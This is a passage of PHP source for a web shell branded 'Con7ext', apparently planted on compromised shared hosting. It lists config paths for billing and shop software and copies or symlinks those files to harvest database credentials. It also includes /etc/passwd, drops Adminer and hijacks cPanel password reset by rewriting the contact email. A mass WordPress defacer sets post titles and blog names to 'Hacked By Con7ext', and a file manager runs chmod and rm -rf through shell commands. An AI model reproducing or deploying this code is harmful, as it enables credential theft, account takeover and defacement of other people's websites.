739 "/home/$meh/public_html/BILLINGS/submitticket.php" => "WHMCS",
740 "/home/$meh/public_html/Billings/submitticket.php" => "WHMCS",
741 "/home/$meh/public_html/billings/submitticket.php" => "WHMCS",
742 "/home/$meh/public_html/BASKET/submitticket.php" => "WHMCS",
743 "/home/$meh/public_html/Basket/submitticket.php" => "WHMCS",
744 "/home/$meh/public_html/basket/submitticket.php" => "WHMCS",
745 "/home/$meh/public_html/SECURE/submitticket.php" => "WHMCS",
746 "/home/$meh/public_html/Secure/submitticket.php" => "WHMCS",
747 "/home/$meh/public_html/secure/submitticket.php" => "WHMCS",
748 "/home/$meh/public_html/SALES/submitticket.php" => "WHMCS",
749 "/home/$meh/public_html/Sales/submitticket.php" => "WHMCS",
750 "/home/$meh/public_html/sales/submitticket.php" => "WHMCS",
751 "/home/$meh/public_html/BILL/submitticket.php" => "WHMCS",
752 "/home/$meh/public_html/Bill/submitticket.php" => "WHMCS",
753 "/home/$meh/public_html/bill/submitticket.php" => "WHMCS",
754 "/home/$meh/public_html/PURCHASE/submitticket.php" => "WHMCS",
755 "/home/$meh/public_html/Purchase/submitticket.php" => "WHMCS",
756 "/home/$meh/public_html/purchase/submitticket.php" => "WHMCS",
757 "/home/$meh/public_html/ACCOUNT/submitticket.php" => "WHMCS",
758 "/home/$meh/public_html/Account/submitticket.php" => "WHMCS",
759 "/home/$meh/public_html/account/submitticket.php" => "WHMCS",
760 "/home/$meh/public_html/USER/submitticket.php" => "WHMCS",
761 "/home/$meh/public_html/User/submitticket.php" => "WHMCS",
762 "/home/$meh/public_html/user/submitticket.php" => "WHMCS",
763 "/home/$meh/public_html/CLIENTS/submitticket.php" => "WHMCS",
764 "/home/$meh/public_html/Clients/submitticket.php" => "WHMCS",
765 "/home/$meh/public_html/clients/submitticket.php" => "WHMCS",
766 "/home/$meh/public_html/BILLINGS/submitticket.php" => "WHMCS",
767 "/home/$meh/public_html/Billings/submitticket.php" => "WHMCS",
768 "/home/$meh/public_html/billings/submitticket.php" => "WHMCS",
769 "/home/$meh/public_html/MY/submitticket.php" => "WHMCS",
770 "/home/$meh/public_html/My/submitticket.php" => "WHMCS",
771 "/home/$meh/public_html/my/submitticket.php" => "WHMCS",
772 "/home/$meh/public_html/secure/whm/submitticket.php" => "WHMCS",
773 "/home/$meh/public_html/secure/whmcs/submitticket.php" => "WHMCS",
774 "/home/$meh/public_html/panel/submitticket.php" => "WHMCS",
775 "/home/$meh/public_html/clientes/submitticket.php" => "WHMCS",
776 "/home/$meh/public_html/cliente/submitticket.php" => "WHMCS",
777 "/home/$meh/public_html/support/order/submitticket.php" => "WHMCS",
778 "/home/$meh/public_html/bb-config.php" => "BoxBilling",
779 "/home/$meh/public_html/boxbilling/bb-config.php" => "BoxBilling",
780 "/home/$meh/public_html/box/bb-config.php" => "BoxBilling",
781 "/home/$meh/public_html/host/bb-config.php" => "BoxBilling",
782 "/home/$meh/public_html/Host/bb-config.php" => "BoxBilling",
783 "/home/$meh/public_html/supportes/bb-config.php" => "BoxBilling",
784 "/home/$meh/public_html/support/bb-config.php" => "BoxBilling",
785 "/home/$meh/public_html/hosting/bb-config.php" => "BoxBilling",
786 "/home/$meh/public_html/cart/bb-config.php" => "BoxBilling",
787 "/home/$meh/public_html/order/bb-config.php" => "BoxBilling",
788 "/home/$meh/public_html/client/bb-config.php" => "BoxBilling",
789 "/home/$meh/public_html/clients/bb-config.php" => "BoxBilling",
790 "/home/$meh/public_html/cliente/bb-config.php" => "BoxBilling",
791 "/home/$meh/public_html/clientes/bb-config.php" => "BoxBilling",
792 "/home/$meh/public_html/billing/bb-config.php" => "BoxBilling",
793 "/home/$meh/public_html/billings/bb-config.php" => "BoxBilling",
794 "/home/$meh/public_html/my/bb-config.php" => "BoxBilling",
795 "/home/$meh/public_html/secure/bb-config.php" => "BoxBilling",
796 "/home/$meh/public_html/support/order/bb-config.php" => "BoxBilling",
797 "/home/$meh/public_html/includes/dist-configure.php" => "Zencart",
798 "/home/$meh/public_html/zencart/includes/dist-configure.php" => "Zencart",
799 "/home/$meh/public_html/products/includes/dist-configure.php" => "Zencart",
800 "/home/$meh/public_html/cart/includes/dist-configure.php" => "Zencart",
801 "/home/$meh/public_html/shop/includes/dist-configure.php" => "Zencart",
802 "/home/$meh/public_html/includes/iso4217.php" => "Hostbills",
803 "/home/$meh/public_html/hostbills/includes/iso4217.php" => "Hostbills",
804 "/home/$meh/public_html/host/includes/iso4217.php" => "Hostbills",
805 "/home/$meh/public_html/Host/includes/iso4217.php" => "Hostbills",
806 "/home/$meh/public_html/supportes/includes/iso4217.php" => "Hostbills",
807 "/home/$meh/public_html/support/includes/iso4217.php" => "Hostbills",
808 "/home/$meh/public_html/hosting/includes/iso4217.php" => "Hostbills",
809 "/home/$meh/public_html/cart/includes/iso4217.php" => "Hostbills",
810 "/home/$meh/public_html/order/includes/iso4217.php" => "Hostbills",
811 "/home/$meh/public_html/client/includes/iso4217.php" => "Hostbills",
812 "/home/$meh/public_html/clients/includes/iso4217.php" => "Hostbills",
813 "/home/$meh/public_html/cliente/includes/iso4217.php" => "Hostbills",
814 "/home/$meh/public_html/clientes/includes/iso4217.php" => "Hostbills",
815 "/home/$meh/public_html/billing/includes/iso4217.php" => "Hostbills",
816 "/home/$meh/public_html/billings/includes/iso4217.php" => "Hostbills",
817 "/home/$meh/public_html/my/includes/iso4217.php" => "Hostbills",
818 "/home/$meh/public_html/secure/includes/iso4217.php" => "Hostbills",
819 "/home/$meh/public_html/support/order/includes/iso4217.php" => "Hostbills"
820 );
821 foreach($mah as $conf => $name){
822 if($_POST["conf"] == "grab"){
823 $confs = file_get_contents($conf);
824 if($confs == ''){
825 ///GIMME NULL
826 }
827 else{
828 $file = fopen("con7ext_conf/grab/$meh-$conf.txt", "w");
829 fputs($file, $confs);
830 }
831 }
832 elseif($_POST["conf"] == "sym"){
833 @symlink($conf, "con7ext_conf/sym/$meh-$conf.txt");
834 }
835 elseif($_POST["conf"] == "404"){
836 @mkdir("con7ext_conf/404/$meh-$conf.txt404", 0777);
837 @file_put_contents("con7ext_conf/404/$meh-$conf.txt404/.htaccess", 4042);
838 @symlink($conf, "con7ext_conf/404/$meh-$conf.txt404/con7ext.txt");
839 }
840 }
841 }
842 }
843 else{
844 echo "<form method=\"POST\" action=\"\">
845 <center>
846 <textarea name=\"pws\">";
847 echo include("/etc/passwd");
848 echo "</textarea><br>
849 <select name=\"conf\">
850 <option>--Select---</option>
851 <option value=\"grab\">Config Grab</option>
852 <option value=\"sym\">Symlink Config</option>
853 <option value=\"404\">Config Grab 404</option>
854 <option value=\"vhosts\">Vhost Config</option>
855 </select>
856 <input type=\"submit\" name=\"subm\" value=\"Grab\">";
857 }
858 }
859 elseif($nTod == "adminer"){
860 $meh = makeRequest("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php");
861 if(file_exists("adminer.php")){
862 echo "<script>alert(\"File is Exists here is $mpss/adminer.php\");</script>";
863 }
864 else{
865 $fp = fopen("adminer.php", "w");
866 if(fwrite($fp, $meh)){
867 echo "<center><h1><a href=\"$mpss/adminer.php\" target=\"_blank\"> Login Adminer </a></h1></center>";
868 fclose($fp);
869 }
870 else{
871 echo "<script>alert(\"Failed to create a adminer\");</script>";
872 }
873 }
874 }
875 elseif($nTod == "cpreset"){
876 if(function_exists("posix_getpwuid")){
877 $meh = @posix_getpwuid(fileowner(__FILE__));
878 }
879 else{
880 $meh = fileowner(__FILE__);
881 }
882 if(is_dir("/home/".$meh["name"]."/.cpanel")){
883 echo "<center>
884 <h1>Cpanel Reset</h1>
885 <form method=\"POST\">
886 <input type=\"text\" name=\"email\" placeholder=\"email@kntlo.com\" required>
887 <input type=\"submit\" name=\"subm\" value=\"Reset\"></center>";
888 $mps = makeRequest($ip."/cpanel");
889 if($_POST["subm"]){
890 if(preg_match("/>Reset Password/", $mps)){
891 $fp = fopen("/home/".$meh["name"]."/.contactemail", "w");
892 if(fwrite($fp, $_POST["email"])){
893 echo "<center>Success ... Try to reset password User: ".$meh["name"]." | ".$_POST["email"]." | <a href=\"http://$ip/cpanel\">Click Here</a></center>";
894 @unlink("/home/".$meh["name"]."/.cpanel/contactinfo");
895 }
896 else{
897 echo "<script>alert(\"Sorry i can't edit file .contactemail please try manual\");</script>";
898 }
899 }
900 else{
901 echo "<center>Its cpanel host but Reset password is disabled :|</center>";
902 }
903 }
904 }
905 else{
906 echo "<script>alert(\"Sorry Is not a cpanel Host\");</script>";
907 }
908 }
909 elseif($nTod == "titleChange"){
910 echo "<center>";
911 echo "
912 <h1>Mass Wordpress Title Changer</h1>
913 <form method=\"POST\">
914 Link Config: <input type=\"text\" name=\"conf\" placeholder=\"http://site.com/con7ext_conf/sym/\">
915 <input type=\"submit\" name =\"Change\" value=\"Change\">
916 </form>";
917 if($_POST["Change"]){
918 echo "
919 <form method=\"POST\">
920 <br>
921 <textarea name=\"list\">";
922 getBwah($_POST["conf"], 'wordpress');
923 echo "</textarea><br>ID Article:
924 <input type=\"text\" name=\"artcID\" value=\"1\"><br>
925 TITLE :
926 <input type=\"text\" name=\"toTitle\" value=\"Hacked By Con7ext\"><br>
927 CONTENT :
928 <input type=\"text\" name=\"conT\" value=\"Hacked By Con7ext\"><br>
929 POSTNAME :
930 <input type=\"text\" name=\"pName\" value=\"Hacked By Con7ext\"><br>
931 <input type=\"submit\" name=\"subm\" value=\"Change\">
932 </form>";
933 if($_POST["subm"]){
934 $title = htmlspecialchars($_POST["toTitle"]);
935 $id = @$_POST["artcID"];
936 $cont = @$_POST["conT"];
937 $postn = @$_POST["pName"];
938 $link = explode("\r\n", $_POST["list"]);
939 foreach($link as $conf){
940 $config = cookieRequest($conf);
941 $host = getStr($config, "DB_HOST', '", "'");
942 $user = getStr($config, "DB_USER', '", "'");
943 $pass = getStr($config, "DB_PASSWORD', '", "'");
944 $name = getStr($config, "DB_NAME', '", "'");
945 $pref = getStr($config, "table_prefix = '", "'");
946 $fix = $pref."posts";
947 $ops = $pref."optios";
948 $conn = mysql_connect($host, $user, $pass);
949 $db = mysql_select_db($name);
950 $query = mysql_query("SELECT * FROM $fix ORDER BY ID ASC");
951 $query2 = mysql_query("SELECT * FROM $ops ORDER BY option_id ASC");
952 $re = mysql_fetch_array($query);
953 $re2 = mysql_fetch_array($query2);
954 $id = $re[ID];
955 $tar = $re2[option_value];
956 $update = mysql_query("UPDATE $fix SET post_title='$title',post_content='$cont',post_name='$postn',post_status='publish',comment_status='open',post_type='post',comment_count='1' WHERE id='$id'");
957 $update .= mysql_query("UPDATE $ops SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
958 if($tar == ''){
959 echo "URL: error, i can't pick domain -> ";
960 }
961 else{
962 echo "URL: <a href=\"$tar/?p=$id\" target=\"_blank\">$tar/?p=$id</a> -> ";
963 }
964 if(!$update || !$conn || $db){
965 echo "MySQL Error: ".mysql_error()."<br>";
966 }
967 else{
968 echo "Success Change.<br>";
969 }
970 mysql_close($conn);
971 }
972 }
973 }
974 echo "</center>";
975 }
976/// SOME FUCKING HERE ///
977 elseif($_GET['action'] == "nFile"){
978 if($_POST["new_save_file"]){
979 $newfile = htmlspecialchars($_POST["newfile"]);
980 $open = fopen($newfile, "a+");
981 if($open){
982 $action = "<script>window.location=\"?action=edit&dir=$dir&file=".$_POST['newfile']."\";</script>";
983 }
984 else{
985 $action = "<script>alert(\"Permission Denied\");</script>";
986 }
987 }
988 echo $action;
989 echo "
990 <form method=\"POST\">
991 Filename: <input type=\"text\" name=\"newfile\" value=\"$dir/ntod.php\">
992 <input type=\"submit\" name=\"new_save_file\" value=\"Submit\">
993 </form>";
994 }
995 elseif($_GET["action"] == "nFolder"){
996 if($_POST['new_act_folder']){
997 $newFolder = $dir."/".htmlspecialchars($_POST["new_folder"]);
998 if(!mkdir($newFolder)){
999 $action = "<script>alert(\"Permission Denied\");</script>";
1000 }
1001 else{
1002 $action = "<script>window.location=\"?dir=$dir\";</script>";
1003 }
1004 }
1005 echo $action;
1006 echo "<form method=\"POST\">
1007 Folder Name: <input type=\"text\" name=\"new_folder\">
1008 <input type=\"submit\" name=\"new_act_folder\" value=\"Submit\">
1009 </form>";
1010 }
1011 elseif($_GET["action"] == "dRename"){
1012 if($_POST["dir_act_rename"]){
1013 $dRename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST["dir_name"])."");
1014 if($dRename){
1015 $action = "<script>window.location=\"?dir=".dirname($dir)."\";</script>";
1016 }
1017 else{
1018 $action = "<script>alert(\"Permission Denied\");</script>";
1019 }
1020 echo "".$act."<br>";
1021 }
1022 echo "<form method=\"POST\">
1023 <input type=\"text\" value=\"".basename($dir)."\" name=\"dir_name\">
1024 <input type=\"submit\" name=\"dir_act_rename\" value=\"Rename\">
1025 </form>";
1026 }
1027 elseif($_GET['action'] == "chmod_dir"){
1028 echo "<form method=\"POST\">
1029 <input type=\"text\" name=\"ch_target\" value=\"$dir\"><br>
1030 <input type=\"text\" name=\"ch_mod\" value=\"0755\">
1031 <input type=\"submit\" name=\"act_ch\" value=\"Chmod\">
1032 </form>";
1033 if($_POST["act_ch"]){
1034 $haha = (execute("chmod ".@$_POST["ch_mod"]." ".@$_POST["ch_target"].";echo success")) ? "<font color=\"#1D8348\">Successfully</font>" : "<font color=\"#C0392B\">Failed</font>";
1035 echo "Chmod To ".@$_POST["ch_mod"]." ".$haha;
1036 }
1037 }
1038 elseif($_GET["action"] == "delete_dir"){
1039 if(is_dir($dir)){
1040 if(is_writable($dir)){
1041 @rmdir($dir);
1042 @execute("rm -rf $dir");
1043 @execute("rmdir /s /q $dir");
1044 $action = "<script>window.location=\"?dir=".dirname($dir)."\";</script>";
1045 }
1046 else{
1047 $action = "<script>alert(\"Could not remove ".basename($dir)."\");</script>";
1048 }
1049 }
1050 echo $action;
1051 }
1052 elseif($_GET["action"] == "chmod"){
1053 echo "<form method=\"POST\"><input type=\"text\" name=\"ch_target\" value=\"".$_GET['file']."\"><br><input type=\"text\" name=\"ch_mod\" value=\"0755\"><input type=\"submit\" name=\"act_ch\" value=\"Chmod\"></form>";
1054 if($_POST["act_ch"]){
1055 $haha = (execute("chmod ".@$_POST["ch_mod"]." ".@$_POST["ch_target"].";echo success")) ? "<font color=\"#1D8348\">Successfully</font>" : "<font color=\"#C0392B\">Failed</font>";
1056 echo "Chmod To ".@$_POST["ch_mod"]." ".$haha;
1057 }
1058 }
1059 elseif($_GET['action'] == "view"){
1060 echo "Filename: <font color=\"#1D8348\">".basename($_GET["file"])."</font> | <a href=\"?action=view&dir=$dir&file=".$_GET["file"]."\"><u>View</u></a> | <a href=\"?action=edit&dir=$dir&file=".$_GET["file"]."\">Edit</a> | <a href=\"?action=rename&dir=$dir&file=".$_GET["file"]."\">Rename</a> | <a href=\"?action=chmod&dir=$dir&file=".$_GET["file"]."\">Chmod</a> | <a href=\"?action=download&dir=$dir&file=".$_GET["file"]."\">Download</a> | <a href=\"?action=delete&dir=$dir&file=".$_GET["file"]."\">Delete</a><br>";
1061 echo "<pre><texarea disabled>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea></pre>";
1062 }
1063 elseif($_GET["action"] == "edit"){
1064 if($_POST['save']){
1065 $save = @file_put_contents($_GET['file'], $_POST['new']);
1066 if($save){
1067 $action = "<font color=\"#1D8348\">".$_GET['file']." Saved!</font>";
1068 }
1069 else{
1070 $action = "<script>alert(\"Could not edit file... permission denied\");</script>";
1071 }
1072 echo "".$action."<br>";
1073 }
1074 echo "Filename: <font color=\"#1D8348\">".basename($_GET["file"])."</font> | <a href=\"?action=view&dir=$dir&file=".$_GET["file"]."\">View</a> | <a href=\"?action=edit&dir=$dir&file=".$_GET["file"]."\"><u>Edit</u></a> | <a href=\"?action=rename&dir=$dir&file=".$_GET["file"]."\">Rename</a> | <a href=\"?action=chmod&dir=$dir&file=".$_GET["file"]."\">Chmod</a> | <a href=\"?action=download&dir=$dir&file=".$_GET["file"]."\">Download</a> | <a href=\"?action=delete&dir=$dir&file=".$_GET["file"]."\">Delete</a><br>";
1075 echo "<form method=\"POST\">
1076 <textarea name=\"new\">".htmlspecialchars(@file_get_contents($_GET["file"]))."</textarea><br>
1077 <input type=\"submit\" value=\"Save\" name=\"save\">
1078 </form>";
1079 }
1080 elseif($_GET["action"] == "rename"){
1081 if($_POST["act_rename"]){
1082 $rename = rename($_GET["file"], "$dir/".htmlspecialchars($_POST["rename"])."");
1083 if($rename){
1084 $action = "<script>window.location=\"?dir=$dir\";</script>";
1085 }
1086 else{
1087 $action = "<script>alert(\"Permission Denied\");</script>";
1088 }
1089 echo "".$action."<br>";
1090 }
1091 echo "Filename: <font color=\"#1D8348\">".basename($_GET["file"])."</font> | <a href=\"?action=view&dir=$dir&file=".$_GET["file"]."\">View</a> | <a href=\"?action=edit&dir=$dir&file=".$_GET["file"]."\">Edit</a> | <a href=\"?action=rename&dir=$dir&file=".$_GET["file"]."\"><u>Rename</u></a> | <a href=\"?action=chmod&dir=$dir&file=".$_GET["file"]."\">Chmod</a> | <a href=\"?action=download&dir=$dir&file=".$_GET["file"]."\">Download</a> | <a href=\"?action=delete&dir=$dir&file=".$_GET["file"]."\">Delete</a><br>";
1092 echo "<from method=\"POST\">
1093 <input type=\"text\" value=\"".basename($_GET["file"])."\" name=\"rename\">
1094 <input type=\"submit\" name=\"act_rename\" value=\"Rename\">
1095 </form>";
1096 }
1097 elseif($_GET["action"] == "delete"){
1098 $delete = @unlink($_GET["file"]);
1099 if($delete){
1100 $action = "<script>window.location=\"?dir=$dir\";</script>";
1101 }
1102 else{
1103 $action = "<script>alert(\"Could not delete file... Permission denied\");</script>";
1104 }
1105 echo $action;
1106 }
1107 else{
1108 $scan = scandir($dir);
1109 if(is_dir($dir) === true){
1110 if(!is_readable($dir)){
1111 echo "<script>alert(\"Could not open directory ... permission denied\");</script>";
1112 }
1113 else{
1114 echo "
1115 <table>
1116 <tr>
1117 <th class=\"th_class\"><center>Name</center></th>
1118 <th class=\"th_class\"><center>Type</center></th>
1119 <th class=\"th_class\"><center>Last Modified</center></th>
1120 <th class=\"th_class\"><center>Owner/Group</center</th>
1121 <td class=\"th_class\"><center>Permission</center></th>
1122 <td class=\"th_class\"><center>Action</center</th>
1123 </tr>";
1124 foreach($scan as $dirs){
1125 $type = filetype("$dir/$dirs");
1126 $time = date("F d Y g:i:s", filemtime("$dir/$dirs"));
1127 if(function_exists('posix_getpwuid')){
1128 $owner = @posix_getpwuid(fileowner("$dir/$dirs"));
1129 $owner = $owner['name'];
1130 }
1131 else{
1132 $owner = fileowner("$dir/$dirs");
1133 }
1134 if(function_exists("posix_getgrgid")){
1135 $grp = @posix_getgrgid(filegroup("$dir/$dirs"));
1136 $grp = $grp['name'];
1137 }
1138 else{
1139 $grp = filegroup("$dir/$dirs");
1140 }
1141 if(!is_dir("$dir/$dirs")) continue;
1142 if($dirs === ".."){
1143 $lnk = "<a href=\"?dir=".dirname($dir)."\">$dirs</a>";
1144 }
1145 elseif($dirs === "."){
1146 $lnk = "<a href=\"?dir=$dir\">$dirs</a>";
1147 }
1148 else{
1149 $lnk = "<a href=\"?dir=$dir/$dirs\">$dirs</a>";
1150 }
1151 if($dirs === "." || $dirs === ".."){
1152 $actd = "<a href=\"?action=nFile&dir=$dir\">NF</a>|<a href=\"?action=nFolder&dir=$dir\">ND</a>";
1153 }
1154 else{
1155 $actd = "<a href=\"?action=dRename&dir=$dir/$dirs\">R</a>|<a href=\"?action=delete_dir&dir=$dir/$dirs\">D</a>|<a href=\"?action=chmod_dir&dir=$dir/$dirs\">C</a>";
1156 }
1157 echo "
1158 <tr>
1159 <td class=\"td_class\"><img src=\"https://cdn1.iconfinder.com/data/icons/hawcons/32/699086-icon-94-folder-512.png\" width=\"25\" height=\"16\"> $lnk</td>
1160 <td class=\"td_class\"><center>$type</center></td>
1161 <td class=\"td_class\"><center>$time</center></td>
1162 <td class=\"td_class\"><center>$owner/$grp</center></td>
1163 <td class=\"td_class\"><center>".writAble("$dir/$dirs", perms("$dir/$dirs"))."</center</td>
1164 <td class=\"td_class\" style=\"padding-left: 15px;\">$actd</td>
1165 </tr>";
1166 }
1167 }
1168 }
1169 else{
1170 echo "<script>alert(\"Could not open directory\");</script>";
1171 }
1172 foreach($scan as $file){
1173 $type = filetype("$dir/$file");
1174 $time = date("F d Y g:i:s", filemtime("$dir/$file"));
1175 if(function_exists('posix_getpwuid')){
1176 $owner = @posix_getpwuid(fileowner("$dir/$file"));
1177 $owner = $owner["name"];
1178 }
1179 else{
1180 $owner = fileowner("$dir/$file");
1181 }
1182 if(function_exists("posix_getgrgid")){
1183 $grp = @posix_getgrgid(filegroup("$dir/$file"));
1184 $grp = $grp["name"];
1185 }
1186 else{
1187 $grp = filegroup("$dir/$file");
1188 }
1189 if(function_exists("pathinfo")){
1190 $meh = pathinfo($file);
1191 if($meh["extension"] == "php"){
1192 $gambar = "https://cdn2.iconfinder.com/data/icons/files-coding/24/files-coding-php-128.png";
1193 }
1194 elseif($meh["extension"] == "js"){
1195 $gambar = "https://cdn2.iconfinder.com/data/icons/files-coding/24/files-coding-js-128.png";
1196 }
1197 elseif($meh["extension"] == "sql"){
1198 $gambar = "https://cdn2.iconfinder.com/data/icons/files-coding/24/files-coding-sql-128.png";
1199 }
1200 elseif($meh["extension"] == "xml"){
1201 $gambar = "https://cdn2.iconfinder.com/data/icons/files-coding/24/files-coding-xml-128.png";
1202 }
1203 elseif($meh["extension"] == "java" || $meh["extension"] == "jsp"){
1204 $gambar = "https://cdn2.iconfinder.com/data/icons/files-coding/24/files-coding-java-512.png";
1205 }
1206 elseif($meh["extension"] == "html"){
1207 $gambar = "https://cdn2.iconfinder.com/data/icons/files-coding/24/files-coding-html-128.png";
1208 }
1209 elseif($meh["extension"] == "css"){
1210 $gambar = "https://cdn2.iconfinder.com/data/icons/files-coding/24/files-coding-css-128.png";
1211 }
1212 elseif($meh["extension"] == "exe"){
1213 $gambar = "https://cdn2.iconfinder.com/data/icons/files-coding/24/files-coding-exe-128.png";
1214 }
1215 elseif($meh["extension"] == "bin"){
1216 $gambar = "https://cdn2.iconfinder.com/data/icons/files-coding/24/files-coding-bin-128.png";
1217 }
1218 elseif($meh["extension"] == "pl"){
1219 $gambar = "https://cdn2.iconfinder.com/data/icons/files-coding/24/files-coding-pl-128.png";
1220 }
1221 elseif($meh["extension"] == "py"){
1222 $gambar = "https://cdn2.iconfinder.com/data/icons/files-coding/24/files-coding-py-128.png";
1223 }
1224 else{
1225 $gambar = "https://cdn2.iconfinder.com/data/icons/files-coding/24/files-coding-app-128.png";
1226 }
1227 }else{
1228 $gambar = "https://cdn2.iconfinder.com/data/icons/files-coding/24/files-coding-app-128.png";
1229 }
1230 if(!is_file("$dir/$file")) continue;
1231 echo "
1232 <tr>
1233 <td class=\"td_class\"><img src=\"$gambar\" width=\"25\" height=\"16\"><a href=\"?action=view&dir=$dir&file=$dir/$file\">$file</a></td>
1234 <td class=\"td_class\"><center>$type</center></td>
1235 <td class=\"td_class\"><center>$time</center></td>
1236 <td class=\"td_class\"><center>$owner/$grp</center></td>
1237 <td class=\"td_class\"><center>".writAble("$dir/$file", perms("$dir/$file"))."</center></td>
1238 <td class=\"td_class\" style=\"padding-left: 15px;\"><a href=\"?action=edit&dir=$dir&file=$dir/$file\">E</a>|<a href=\"?action=rename&dir=$dir&file=$dir/$file\">R</a>|<a href=\"?action=delete&dir=$dir&file=$dir/$file\">D</a>|<a href=\"?action=chmod&dir=$dir&file=$dir/$file\">C</a>|<a href=\"?action=download&dir=$dir&file=$dir/$file\">DL</a></td>
1239 </tr>";
1240 }
1241 echo "</table>";
1242 if(!is_readable($dir)){
1243 //GIMME NULL
1244 }else{
1245 echo "<a href=\"https://www.facebook.com/Con7ext\" target=\"_blank\"><center>Powered By Con7ext</center></a>";
1246 }
1247 }
1248 ?>
1249
1250 </body>
1251</html>